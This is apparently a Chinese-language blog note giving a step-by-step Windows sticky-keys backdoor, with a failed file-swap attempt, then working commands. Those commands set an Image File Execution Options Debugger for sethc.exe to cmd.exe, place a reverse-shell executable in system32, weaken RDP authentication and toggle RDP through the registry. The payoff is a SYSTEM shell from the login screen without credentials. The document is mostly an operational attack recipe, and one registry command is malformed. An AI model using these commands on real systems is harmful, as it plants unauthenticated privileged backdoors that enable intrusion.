粘滞键后门

参考资料

• https://blog.compass-security.com/2018/02/no-need-to-break-in-use-the-backdoor/
• https://mochazz.github.io/2017/07/29/shift/#%E5%81%B7%E5%A4%A9%E6%8D%A2%E6%97%A5
• 2020年5月11日，确定该方法有效。粘滞键后门详述

失败的操作

1 2 3 4 5

cd c:\windows\system32 move sethc.exe sethc.exe.bak #重命名sethc.exe为sethc.exe.bak copy /y cmd.exe sethc.exe 全都提示拒绝访问 本地管理员权限不行、system权限也不行。

成功的操作

1 2 3 4 5 6 7

move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe #将p.exe移动到另一个地址，p.exe是一个反弹shell的exe. #需要本地管理员权限 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f #在登陆面板输入5个shift，即可获得反弹的system权限shell 缺点，在登陆以后，就会丢失反弹连接。

使用场景：在3389远程登陆的时候，无需登陆，调出system权限cmd.exe

实验

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

在受害机器设置user authentication，不需要验证。那么其他机器登入的时候，就会无需验证获得登陆面板。 PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0 --- 受害机器替换cmd.exe，在登陆面板5个shift调出cmd.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f --- 管理员权限命令开启3389远程登陆 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 关闭3389端口 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f windows 10 无效 windows 2008 R2 有效